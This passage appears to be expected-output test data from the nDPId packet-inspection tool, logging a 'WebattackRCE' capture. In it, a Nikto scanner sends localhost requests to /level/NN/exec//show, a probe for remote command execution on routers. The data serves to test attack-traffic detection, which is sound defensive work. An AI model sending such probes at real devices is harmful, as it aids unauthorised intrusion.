+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1576420277677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277677,"pkt":"AAAAAAAAAAAAAAAACABFAADIG8lAAEAGIGV\/AAABfwAAAcZkH5CYBSLNt2luhoAYAED+vAAAAQEICp1m\/tWdZv7VR0VUIC9sZXZlbC82NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1576420277678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277678,"pkt":"AAAAAAAAAAAAAAAACABFAADIttNAAEAGhVp\/AAABfwAAAcZmH5DUdY\/bkd0KuYAYAED+vAAAAQEICp1m\/tadZv7WR0VUIC9sZXZlbC82Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1576420277680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277680,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/OVAAEAGP0h\/AAABfwAAAcZoH5ACKMXwYFGAmIAYAED+vAAAAQEICp1m\/tidZv7YR0VUIC9sZXZlbC82Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1576420277681,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277681,"pkt":"AAAAAAAAAAAAAAAACABFAADIw2NAAEAGeMp\/AAABfwAAAcZqH5BLUvpuf7sPloAYAED+vAAAAQEICp1m\/tmdZv7ZR0VUIC9sZXZlbC82OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTUpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1576420277683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277683,"pkt":"AAAAAAAAAAAAAAAACABFAADIBQVAAEAGNyl\/AAABfwAAAcZsH5CyYjwQgGi0OYAYAED+vAAAAQEICp1m\/tudZv7bR0VUIC9sZXZlbC82OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1576420277685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277685,"pkt":"AAAAAAAAAAAAAAAACABFAADI1dZAAEAGZld\/AAABfwAAAcZuH5B\/K+zaVaEXFIAYAED+vAAAAQEICp1m\/tydZv7cR0VUIC9sZXZlbC83MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTcpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1576420277687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277687,"pkt":"AAAAAAAAAAAAAAAACABFAADIUq1AAEAG6YB\/AAABfwAAAcZwH5AONGunkxG0mYAYAED+vAAAAQEICp1m\/t+dZv7fR0VUIC9sZXZlbC83MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1576420277689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277689,"pkt":"AAAAAAAAAAAAAAAACABFAADIo8lAAEAGmGR\/AAABfwAAAcZyH5BwuZrK24oufIAYAED+vAAAAQEICp1m\/uGdZv7hR0VUIC9sZXZlbC83Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1576420277691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277691,"pkt":"AAAAAAAAAAAAAAAACABFAADIVsBAAEAG5W1\/AAABfwAAAcZ0H5BhJ2+x3S4KSIAYAED+vAAAAQEICp1m\/uOdZv7jR0VUIC9sZXZlbC83My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1576420277693,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277693,"pkt":"AAAAAAAAAAAAAAAACABFAADIebZAAEAGwnd\/AAABfwAAAcZ2H5BNR0C8mP2KqIAYAED+vAAAAQEICp1m\/uWdZv7lR0VUIC9sZXZlbC83NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1576420277695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277695,"pkt":"AAAAAAAAAAAAAAAACABFAADIMBZAAEAGDBh\/AAABfwAAAcZ4H5ACzwkce7l1k4AYAED+vAAAAQEICp1m\/uadZv7mR0VUIC9sZXZlbC83NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 